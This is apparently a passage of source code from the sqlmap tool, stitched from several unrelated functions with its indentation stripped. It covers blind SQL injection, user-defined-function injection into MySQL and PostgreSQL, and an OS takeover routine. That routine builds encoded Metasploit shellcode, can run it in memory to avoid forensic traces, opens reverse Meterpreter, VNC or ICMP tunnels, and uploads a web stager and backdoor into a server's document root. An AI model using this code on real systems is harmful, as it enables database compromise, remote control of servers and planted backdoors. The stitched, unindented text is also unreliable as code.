def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1):
if Backend.isOs(OS.WINDOWS):
opSys = "windows"
else:
opSys = "linux"
message = "which %s do you want to use?" % msg
if lst:
for num, data in lst[opSys].items():
description = data[0]
if num > maxValue:
maxValue = num
if "(default)" in description:
default = num
message += "\n[%d] %s" % (num, description)
else:
message += " [%d] " % default
choice = readInput(message, default="%d" % default)
if not choice or not isDigit(
choice) or int(choice) > maxValue or int(choice) < 1:
choice = default
choice = int(choice)
if lst:
choice = lst[opSys][choice][1]
return choice
def _configUnionChar(char):
if not isinstance(char, six.string_types):
return
kb.uChar = char
if conf.uChar is not None:
kb.uChar = char.replace(
"[CHAR]", conf.uChar if isDigit(conf.uChar) else "'%s'" %
conf.uChar.strip("'"))
def _configUnionCols(columns):
if not isinstance(columns, six.string_types):
return
columns = columns.replace(' ', "")
if '-' in columns:
colsStart, colsStop = columns.split('-')
else:
colsStart, colsStop = columns, columns
if not isDigit(colsStart) or not isDigit(colsStop):
raise SqlmapSyntaxException(
"--union-cols must be a range of integers")
conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop)
if conf.uColsStart > conf.uColsStop:
errMsg = "--union-cols range has to represent lower to "
errMsg += "higher number of columns"
raise SqlmapSyntaxException(errMsg)
def _goInferenceProxy(expression,
fromUser=False,
batch=False,
unpack=True,
charsetType=None,
firstChar=None,
lastChar=None,
dump=False):
"""
Retrieve the output of a SQL query characted by character taking
advantage of an blind SQL injection vulnerability on the affected
parameter through a bisection algorithm.
"""
initTechnique(getTechnique())
query = agent.prefixQuery(getTechniqueData().vector)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
count = None
startLimit = 0
stopLimit = None
outputs = BigArray()
if not unpack:
return _goInference(payload, expression, charsetType, firstChar,
lastChar, dump)
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(
expression)
rdbRegExp = re.search(r"RDB\$GET_CONTEXT\([^)]+\)", expression, re.I)
if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD):
expressionFieldsList = [expressionFields]
if len(expressionFieldsList) > 1:
infoMsg = "the SQL query provided has more than one field. "
infoMsg += "sqlmap will now unpack it into distinct queries "
infoMsg += "to be able to retrieve the output even if we "
infoMsg += "are going blind"
logger.info(infoMsg)
# If we have been here from SQL query/shell we have to check if
# the SQL query might return multiple entries and in such case
# forge the SQL limiting the query output one entry at a time
# NOTE: we assume that only queries that get data from a table
# can return multiple entries
if fromUser and " FROM " in expression.upper() and (
(Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or
(Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE
and not expression.upper().endswith(
FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))
) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(
expression)
if limitCond:
test = True
if not stopLimit or stopLimit <= 1:
if Backend.getIdentifiedDbms(
) in FROM_DUMMY_TABLE and expression.upper().endswith(
FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]):
test = False
if test:
# Count the number of SQL query entries output
countFirstField = queries[Backend.getIdentifiedDbms(
)].count.query % expressionFieldsList[0]
countedExpression = expression.replace(expressionFields,
countFirstField, 1)
if " ORDER BY " in countedExpression.upper():
_ = countedExpression.upper().rindex(" ORDER BY ")
countedExpression = countedExpression[:_]
if not stopLimit:
count = _goInference(payload,
countedExpression,
charsetType=CHARSET_TYPE.DIGITS,
firstChar=firstChar,
lastChar=lastChar)
if isNumPosStrValue(count):
count = int(count)
if batch or count == 1:
stopLimit = count
else:
message = "the SQL query provided can return "
message += "%d entries. How many " % count
message += "entries do you want to retrieve?\n"
message += "[a] All (default)\n[#] Specific number\n"
message += "[q] Quit"
choice = readInput(message, default='A').upper()
if choice == 'A':
stopLimit = count
elif choice == 'Q':
raise SqlmapUserQuitException
elif isDigit(choice) and int(choice) > 0 and int(
choice) <= count:
stopLimit = int(choice)
infoMsg = "sqlmap is now going to retrieve the "
infoMsg += "first %d query output entries" % stopLimit
logger.info(infoMsg)
elif choice in ('#', 'S'):
message = "how many? "
stopLimit = readInput(message, default="10")
if not isDigit(stopLimit):
errMsg = "invalid choice"
logger.error(errMsg)
return None
else:
stopLimit = int(stopLimit)
else:
errMsg = "invalid choice"
logger.error(errMsg)
return None
elif count and not isDigit(count):
warnMsg = "it was not possible to count the number "
warnMsg += "of entries for the SQL query provided. "
warnMsg += "sqlmap will assume that it returns only "
warnMsg += "one entry"
logger.warn(warnMsg)
stopLimit = 1
elif (not count or int(count) == 0):
if not count:
warnMsg = "the SQL query provided does not "
warnMsg += "return any output"
logger.warn(warnMsg)
return None
elif (not stopLimit or stopLimit == 0):
return None
try:
try:
for num in xrange(startLimit, stopLimit):
output = _goInferenceFields(
expression,
expressionFields,
expressionFieldsList,
payload,
num=num,
charsetType=charsetType,
firstChar=firstChar,
lastChar=lastChar,
dump=dump)
outputs.append(output)
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (
startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
raise SqlmapDataException(errMsg)
except KeyboardInterrupt:
print()
warnMsg = "user aborted during dumping phase"
logger.warn(warnMsg)
return outputs
elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper(
).startswith("SELECT ") and " FROM " not in expression.upper():
expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]
outputs = _goInferenceFields(expression,
expressionFields,
expressionFieldsList,
payload,
charsetType=charsetType,
firstChar=firstChar,
lastChar=lastChar,
dump=dump)
return ", ".join(
output or ""
for output in outputs) if not isNoneValue(outputs) else None
def _selectInjection():
"""
Selection function for injection place, parameters and type.
"""
points = {}
for injection in kb.injections:
place = injection.place
parameter = injection.parameter
ptype = injection.ptype
point = (place, parameter, ptype)
if point not in points:
points[point] = injection
else:
for key in points[point]:
if key != 'data':
points[point][key] = points[point][key] or injection[key]
points[point]['data'].update(injection['data'])
if len(points) == 1:
kb.injection = kb.injections[0]
elif len(points) > 1:
message = "there were multiple injection points, please select "
message += "the one to use for following injections:\n"
points = []
for i in xrange(0, len(kb.injections)):
place = kb.injections[i].place
parameter = kb.injections[i].parameter
ptype = kb.injections[i].ptype
point = (place, parameter, ptype)
if point not in points:
points.append(point)
ptype = PAYLOAD.PARAMETER[ptype] if isinstance(ptype,
int) else ptype
message += "[%d] place: %s, parameter: " % (i, place)
message += "%s, type: %s" % (parameter, ptype)
if i == 0:
message += " (default)"
message += "\n"
message += "[q] Quit"
choice = readInput(message, default='0').upper()
if isDigit(choice) and int(choice) < len(
kb.injections) and int(choice) >= 0:
index = int(choice)
elif choice == 'Q':
raise SqlmapUserQuitException
else:
errMsg = "invalid choice"
raise SqlmapValueException(errMsg)
kb.injection = kb.injections[index]
def udfInjectCustom(self):
if Backend.getIdentifiedDbms() not in (DBMS.MYSQL, DBMS.PGSQL):
errMsg = "UDF injection feature only works on MySQL and PostgreSQL"
logger.error(errMsg)
return
if not isStackingAvailable() and not conf.direct:
errMsg = "UDF injection feature requires stacked queries SQL injection"
logger.error(errMsg)
return
self.checkDbmsOs()
if not self.isDba():
warnMsg = "functionality requested probably does not work because "
warnMsg += "the current session user is not a database administrator"
logger.warn(warnMsg)
if not conf.shLib:
msg = "what is the local path of the shared library? "
while True:
self.udfLocalFile = readInput(msg)
if self.udfLocalFile:
break
else:
logger.warn("you need to specify the local path of the shared library")
else:
self.udfLocalFile = conf.shLib
if not os.path.exists(self.udfLocalFile):
errMsg = "the specified shared library file does not exist"
raise SqlmapFilePathException(errMsg)
if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"):
errMsg = "shared library file must end with '.dll' or '.so'"
raise SqlmapMissingMandatoryOptionException(errMsg)
elif self.udfLocalFile.endswith(".so") and Backend.isOs(OS.WINDOWS):
errMsg = "you provided a shared object as shared library, but "
errMsg += "the database underlying operating system is Windows"
raise SqlmapMissingMandatoryOptionException(errMsg)
elif self.udfLocalFile.endswith(".dll") and Backend.isOs(OS.LINUX):
errMsg = "you provided a dynamic-link library as shared library, "
errMsg += "but the database underlying operating system is Linux"
raise SqlmapMissingMandatoryOptionException(errMsg)
self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0]
self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1]
msg = "how many user-defined functions do you want to create "
msg += "from the shared library? "
while True:
udfCount = readInput(msg, default='1')
if udfCount.isdigit():
udfCount = int(udfCount)
if udfCount <= 0:
logger.info("nothing to inject then")
return
else:
break
else:
logger.warn("invalid value, only digits are allowed")
for x in xrange(0, udfCount):
while True:
msg = "what is the name of the UDF number %d? " % (x + 1)
udfName = readInput(msg)
if udfName:
self.udfs[udfName] = {}
break
else:
logger.warn("you need to specify the name of the UDF")
if Backend.isDbms(DBMS.MYSQL):
defaultType = "string"
elif Backend.isDbms(DBMS.PGSQL):
defaultType = "text"
self.udfs[udfName]["input"] = []
msg = "how many input parameters takes UDF "
msg += "'%s'? (default: 1) " % udfName
while True:
parCount = readInput(msg, default='1')
if parCount.isdigit() and int(parCount) >= 0:
parCount = int(parCount)
break
else:
logger.warn("invalid value, only digits >= 0 are allowed")
for y in xrange(0, parCount):
msg = "what is the data-type of input parameter "
msg += "number %d? (default: %s) " % ((y + 1), defaultType)
while True:
parType = readInput(msg, default=defaultType).strip()
if parType.isdigit():
logger.warn("you need to specify the data-type of the parameter")
else:
self.udfs[udfName]["input"].append(parType)
break
msg = "what is the data-type of the return "
msg += "value? (default: %s) " % defaultType
while True:
retType = readInput(msg, default=defaultType)
if hasattr(retType, "isdigit") and retType.isdigit():
logger.warn("you need to specify the data-type of the return value")
else:
self.udfs[udfName]["return"] = retType
break
success = self.udfInjectCore(self.udfs)
if success is False:
self.cleanup(udfDict=self.udfs)
return False
msg = "do you want to call your injected user-defined "
msg += "functions now? [Y/n/q] "
choice = readInput(msg, default='Y').upper()
if choice == 'N':
self.cleanup(udfDict=self.udfs)
return
elif choice == 'Q':
self.cleanup(udfDict=self.udfs)
raise SqlmapUserQuitException
while True:
udfList = []
msg = "which UDF do you want to call?"
for udf in self.udfs.keys():
udfList.append(udf)
msg += "\n[%d] %s" % (len(udfList), udf)
msg += "\n[q] Quit"
while True:
choice = readInput(msg).upper()
if choice == 'Q':
break
elif isDigit(choice) and int(choice) > 0 and int(choice) <= len(udfList):
choice = int(choice)
break
else:
warnMsg = "invalid value, only digits >= 1 and "
warnMsg += "<= %d are allowed" % len(udfList)
logger.warn(warnMsg)
if not isinstance(choice, int):
break
cmd = ""
count = 1
udfToCall = udfList[choice - 1]
for inp in self.udfs[udfToCall]["input"]:
msg = "what is the value of the parameter number "
msg += "%d (data-type: %s)? " % (count, inp)
while True:
parValue = readInput(msg)
if parValue:
if "int" not in inp and "bool" not in inp:
parValue = "'%s'" % parValue
cmd += "%s," % parValue
break
else:
logger.warn("you need to specify the value of the parameter")
count += 1
cmd = cmd[:-1]
msg = "do you want to retrieve the return value of the "
msg += "UDF? [Y/n] "
if readInput(msg, default='Y', boolean=True):
output = self.udfEvalCmd(cmd, udfName=udfToCall)
if output:
conf.dumper.string("return value", output)
else:
dataToStdout("No return value\n")
else:
self.udfExecCmd(cmd, udfName=udfToCall, silent=True)
msg = "do you want to call this or another injected UDF? [Y/n] "
if not readInput(msg, default='Y', boolean=True):
break
self.cleanup(udfDict=self.udfs)
def osPwn(self):
goUdf = False
fallbackToWeb = False
setupSuccess = False
self.checkDbmsOs()
if Backend.isOs(OS.WINDOWS):
msg = "how do you want to establish the tunnel?"
msg += "\n[1] TCP: Metasploit Framework (default)"
msg += "\n[2] ICMP: icmpsh - ICMP tunneling"
while True:
tunnel = readInput(msg, default='1')
if isDigit(tunnel) and int(tunnel) in (1, 2):
tunnel = int(tunnel)
break
else:
warnMsg = "invalid value, valid values are '1' and '2'"
logger.warn(warnMsg)
else:
tunnel = 1
debugMsg = "the tunnel can be established only via TCP when "
debugMsg += "the back-end DBMS is not Windows"
logger.debug(debugMsg)
if tunnel == 2:
isAdmin = runningAsAdmin()
if not isAdmin:
errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to establish an out-of-band ICMP "
errMsg += "tunnel because icmpsh uses raw sockets to "
errMsg += "sniff and craft ICMP packets"
raise SqlmapMissingPrivileges(errMsg)
try:
__import__("impacket")
except ImportError:
errMsg = "sqlmap requires 'python-impacket' third-party library "
errMsg += "in order to run icmpsh master. You can get it at "
errMsg += "https://github.com/SecureAuthCorp/impacket"
raise SqlmapMissingDependence(errMsg)
filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all"
if os.path.exists(filename):
try:
with openFile(filename, "wb") as f:
f.write("1")
except IOError as ex:
errMsg = "there has been a file opening/writing error "
errMsg += "for filename '%s' ('%s')" % (
filename, getSafeExString(ex))
raise SqlmapSystemException(errMsg)
else:
errMsg = "you need to disable ICMP replies by your machine "
errMsg += "system-wide. For example run on Linux/Unix:\n"
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n"
errMsg += "If you miss doing that, you will receive "
errMsg += "information from the database server and it "
errMsg += "is unlikely to receive commands sent from you"
logger.error(errMsg)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
self.sysUdfs.pop("sys_bineval")
self.getRemoteTempPath()
if isStackingAvailable() or conf.direct:
web = False
self.initEnv(web=web)
if tunnel == 1:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?"
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\n[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)"
while True:
choice = readInput(msg, default='1')
if isDigit(choice) and int(choice) in (1, 2):
choice = int(choice)
break
else:
warnMsg = "invalid value, valid values are '1' and '2'"
logger.warn(warnMsg)
if choice == 1:
goUdf = True
if goUdf:
exitfunc = "thread"
setupSuccess = True
else:
exitfunc = "process"
self.createMsfShellcode(exitfunc=exitfunc,
format="raw",
extra="BufferRegister=EAX",
encode="x86/alpha_mixed")
if not goUdf:
setupSuccess = self.uploadShellcodeexec(web=web)
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True
else:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
if Backend.isOs(OS.WINDOWS) and Backend.isDbms(
DBMS.MYSQL) and conf.privEsc:
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg)
elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web)
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True
else:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
if not setupSuccess and Backend.isDbms(
DBMS.MYSQL) and not conf.direct and (not isStackingAvailable()
or fallbackToWeb):
web = True
if fallbackToWeb:
infoMsg = "falling back to web backdoor to establish the tunnel"
else:
infoMsg = "going to use a web backdoor to establish the tunnel"
logger.info(infoMsg)
self.initEnv(web=web, forceInit=fallbackToWeb)
if self.webBackdoorUrl:
if not Backend.isOs(OS.WINDOWS) and conf.privEsc:
# Unset --priv-esc if the back-end DBMS underlying operating
# system is not Windows
conf.privEsc = False
warnMsg = "sqlmap does not implement any operating system "
warnMsg += "user privilege escalation technique when the "
warnMsg += "back-end DBMS underlying system is not Windows"
logger.warn(warnMsg)
if tunnel == 1:
self.createMsfShellcode(exitfunc="process",
format="raw",
extra="BufferRegister=EAX",
encode="x86/alpha_mixed")
setupSuccess = self.uploadShellcodeexec(web=web)
if setupSuccess is not True:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web)
if setupSuccess is not True:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
if setupSuccess:
if tunnel == 1:
self.pwn(goUdf)
elif tunnel == 2:
self.icmpPwn()
else:
errMsg = "unable to prompt for an out-of-band session"
raise SqlmapNotVulnerableException(errMsg)
if not conf.cleanup:
self.cleanup(web=web)
def _selectPayload(self):
if Backend.isOs(OS.WINDOWS) and conf.privEsc:
infoMsg = "forcing Metasploit payload to Meterpreter because "
infoMsg += "it is the only payload that can be used to "
infoMsg += "escalate privileges via 'incognito' extension, "
infoMsg += "'getsystem' command or post modules"
logger.info(infoMsg)
_payloadStr = "windows/meterpreter"
else:
_payloadStr = self._skeletonSelection("payload",
self._msfPayloadsList)
if _payloadStr == "windows/vncinject":
choose = False
if Backend.isDbms(DBMS.MYSQL):
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, it is likely that the the VNC "
debugMsg += "injection will be successful"
logger.debug(debugMsg)
elif Backend.isDbms(DBMS.PGSQL):
choose = True
warnMsg = "by default PostgreSQL on Windows runs as "
warnMsg += "postgres user, it is unlikely that the VNC "
warnMsg += "injection will be successful"
logger.warn(warnMsg)
elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(
("2005", "2008")):
choose = True
warnMsg = "it is unlikely that the VNC injection will be "
warnMsg += "successful because usually Microsoft SQL Server "
warnMsg += "%s runs as Network Service " % Backend.getVersion()
warnMsg += "or the Administrator is not logged in"
logger.warn(warnMsg)
if choose:
message = "what do you want to do?\n"
message += "[1] Give it a try anyway\n"
message += "[2] Fall back to Meterpreter payload (default)\n"
message += "[3] Fall back to Shell payload"
while True:
choice = readInput(message, default="2")
if not choice or choice == "2":
_payloadStr = "windows/meterpreter"
break
elif choice == "3":
_payloadStr = "windows/shell"
break
elif choice == "1":
if Backend.isDbms(DBMS.PGSQL):
logger.warn(
"beware that the VNC injection might not work")
break
elif Backend.isDbms(
DBMS.MSSQL) and Backend.isVersionWithin(
("2005", "2008")):
break
elif not isDigit(choice):
logger.warn("invalid value, only digits are allowed")
elif int(choice) < 1 or int(choice) > 2:
logger.warn("invalid value, it must be 1 or 2")
if self.connectionStr.startswith(
"reverse_http") and _payloadStr != "windows/meterpreter":
warnMsg = "Reverse HTTP%s connection is only supported " % (
"S" if self.connectionStr.endswith("s") else "")
warnMsg += "with the Meterpreter payload. Falling back to "
warnMsg += "reverse TCP"
logger.warn(warnMsg)
self.connectionStr = "reverse_tcp"
return _payloadStr
def webInit(self):
"""
This method is used to write a web backdoor (agent) on a writable
remote directory within the web server document root.
"""
if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webPlatform is not None:
return
self.checkDbmsOs()
default = None
choices = list(getPublicTypeMembers(WEB_PLATFORM, True))
for ext in choices:
if conf.url.endswith(ext):
default = ext
break
if not default:
default = WEB_PLATFORM.ASP if Backend.isOs(
OS.WINDOWS) else WEB_PLATFORM.PHP
message = "which web application language does the web server "
message += "support?\n"
for count in xrange(len(choices)):
ext = choices[count]
message += "[%d] %s%s\n" % (count + 1, ext.upper(),
(" (default)"
if default == ext else ""))
if default == ext:
default = count + 1
message = message[:-1]
while True:
choice = readInput(message, default=str(default))
if not isDigit(choice):
logger.warn("invalid value, only digits are allowed")
elif int(choice) < 1 or int(choice) > len(choices):
logger.warn("invalid value, it must be between 1 and %d" %
len(choices))
else:
self.webPlatform = choices[int(choice) - 1]
break
if not kb.absFilePaths:
message = "do you want sqlmap to further try to "
message += "provoke the full path disclosure? [Y/n] "
if readInput(message, default='Y', boolean=True):
headers = {}
been = set([conf.url])
for match in re.finditer(
r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-",
kb.originalPage or "", re.I):
url = "%s%s" % (conf.url.replace(
conf.path, match.group(4)), "wp-content/wp-db.php")
if url not in been:
try:
page, _, _ = Request.getPage(url=url,
raise404=False,
silent=True)
parseFilePaths(page)
except:
pass
finally:
been.add(url)
url = re.sub(r"(\.\w+)\Z", r"~\g<1>", conf.url)
if url not in been:
try:
page, _, _ = Request.getPage(url=url,
raise404=False,
silent=True)
parseFilePaths(page)
except:
pass
finally:
been.add(url)
for place in (PLACE.GET, PLACE.POST):
if place in conf.parameters:
value = re.sub(r"(\A|&)(\w+)=", r"\g<2>[]=",
conf.parameters[place])
if "[]" in value:
page, headers, _ = Request.queryPage(
value=value,
place=place,
content=True,
raise404=False,
silent=True,
noteResponseTime=False)
parseFilePaths(page)
cookie = None
if PLACE.COOKIE in conf.parameters:
cookie = conf.parameters[PLACE.COOKIE]
elif headers and HTTP_HEADER.SET_COOKIE in headers:
cookie = headers[HTTP_HEADER.SET_COOKIE]
if cookie:
value = re.sub(
r"(\A|;)(\w+)=[^;]*",
r"\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
cookie)
if value != cookie:
page, _, _ = Request.queryPage(value=value,
place=PLACE.COOKIE,
content=True,
raise404=False,
silent=True,
noteResponseTime=False)
parseFilePaths(page)
value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=", cookie)
if value != cookie:
page, _, _ = Request.queryPage(value=value,
place=PLACE.COOKIE,
content=True,
raise404=False,
silent=True,
noteResponseTime=False)
parseFilePaths(page)
directories = list(arrayizeValue(getManualDirectories()))
directories.extend(getAutoDirectories())
directories = list(OrderedSet(directories))
path = _urllib.parse.urlparse(conf.url).path or '/'
path = re.sub(r"/[^/]*\.\w+\Z", '/', path)
if path != '/':
_ = []
for directory in directories:
_.append(directory)
if not directory.endswith(path):
_.append("%s/%s" %
(directory.rstrip('/'), path.strip('/')))
directories = _
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True),
self.webPlatform)
backdoorContent = getText(
decloak(
os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors",
"backdoor.%s_" % self.webPlatform)))
stagerContent = getText(
decloak(
os.path.join(paths.SQLMAP_SHELL_PATH, "stagers",
"stager.%s_" % self.webPlatform)))
for directory in directories:
if not directory:
continue
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True),
self.webPlatform)
self.webStagerFilePath = posixpath.join(
ntToPosixSlashes(directory), stagerName)
uploaded = False
directory = ntToPosixSlashes(normalizePath(directory))
if not isWindowsDriveLetterPath(
directory) and not directory.startswith('/'):
directory = "/%s" % directory
if not directory.endswith('/'):
directory += '/'
# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
infoMsg = "trying to upload the file stager on '%s' " % directory
infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
logger.info(infoMsg)
self._webFileInject(stagerContent, stagerName, directory)
for match in re.finditer('/', directory):
self.webBaseUrl = "%s://%s:%d%s/" % (
conf.scheme, conf.hostname, conf.port,
directory[match.start():].rstrip('/'))
self.webStagerUrl = _urllib.parse.urljoin(
self.webBaseUrl, stagerName)
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl,
direct=True,
raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" in uplPage:
uploaded = True
break
# Fall-back to UNION queries file upload method
if not uploaded:
warnMsg = "unable to upload the file stager "
warnMsg += "on '%s'" % directory
singleTimeWarnMessage(warnMsg)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
infoMsg = "trying to upload the file stager on '%s' " % directory
infoMsg += "via UNION method"
logger.info(infoMsg)
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True),
self.webPlatform)
self.webStagerFilePath = posixpath.join(
ntToPosixSlashes(directory), stagerName)
handle, filename = tempfile.mkstemp()
os.close(handle)
with openFile(filename, "w+b") as f:
_ = getText(
decloak(
os.path.join(paths.SQLMAP_SHELL_PATH,
"stagers",
"stager.%s_" % self.webPlatform)))
_ = _.replace(
SHELL_WRITABLE_DIR_TAG,
directory.replace('/', '\\\\')
if Backend.isOs(OS.WINDOWS) else directory)
f.write(_)
self.unionWriteFile(filename,
self.webStagerFilePath,
"text",
forceCheck=True)
for match in re.finditer('/', directory):
self.webBaseUrl = "%s://%s:%d%s/" % (
conf.scheme, conf.hostname, conf.port,
directory[match.start():].rstrip('/'))
self.webStagerUrl = _urllib.parse.urljoin(
self.webBaseUrl, stagerName)
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl,
direct=True,
raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" in uplPage:
uploaded = True
break
if not uploaded:
continue
if "<%" in uplPage or "<?" in uplPage:
warnMsg = "file stager uploaded on '%s', " % directory
warnMsg += "but not dynamically interpreted"
logger.warn(warnMsg)
continue
elif self.webPlatform == WEB_PLATFORM.ASPX:
kb.data.__EVENTVALIDATION = extractRegexResult(
EVENTVALIDATION_REGEX, uplPage)
kb.data.__VIEWSTATE = extractRegexResult(
VIEWSTATE_REGEX, uplPage)
infoMsg = "the file stager has been successfully uploaded "
infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl)
logger.info(infoMsg)
if self.webPlatform == WEB_PLATFORM.ASP:
match = re.search(
r'input type=hidden name=scriptsdir value="([^"]+)"',
uplPage)
if match:
backdoorDirectory = match.group(1)
else:
continue
_ = "tmpe%s.exe" % randomStr(lowercase=True)
if self.webUpload(backdoorName,
backdoorDirectory,
content=backdoorContent.replace(
SHELL_WRITABLE_DIR_TAG,
backdoorDirectory).replace(
SHELL_RUNCMD_EXE_TAG, _)):
self.webUpload(_,
backdoorDirectory,
filepath=os.path.join(
paths.SQLMAP_EXTRAS_PATH, "runcmd",
"runcmd.exe_"))
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl,
backdoorName)
self.webDirectory = backdoorDirectory
else:
continue
else:
if not self.webUpload(backdoorName,
posixToNtSlashes(directory) if
Backend.isOs(OS.WINDOWS) else directory,
content=backdoorContent):
warnMsg = "backdoor has not been successfully uploaded "
warnMsg += "through the file stager possibly because "
warnMsg += "the user running the web server process "
warnMsg += "has not write privileges over the folder "
warnMsg += "where the user running the DBMS process "
warnMsg += "was able to upload the file stager or "
warnMsg += "because the DBMS and web server sit on "
warnMsg += "different servers"
logger.warn(warnMsg)
message = "do you want to try the same method used "
message += "for the file stager? [Y/n] "
if readInput(message, default='Y', boolean=True):
self._webFileInject(backdoorContent, backdoorName,
directory)
else:
continue
self.webBackdoorUrl = posixpath.join(
ntToPosixSlashes(self.webBaseUrl), backdoorName)
self.webDirectory = directory
self.webBackdoorFilePath = posixpath.join(
ntToPosixSlashes(directory), backdoorName)
testStr = "command execution test"
output = self.webBackdoorRunCmd("echo %s" % testStr)
if output == "0":
warnMsg = "the backdoor has been uploaded but required privileges "
warnMsg += "for running the system commands are missing"
raise SqlmapNoneDataException(warnMsg)
elif output and testStr in output:
infoMsg = "the backdoor has been successfully "
else:
infoMsg = "the backdoor has probably been successfully "
infoMsg += "uploaded on '%s' - " % self.webDirectory
infoMsg += self.webBackdoorUrl
logger.info(infoMsg)
break
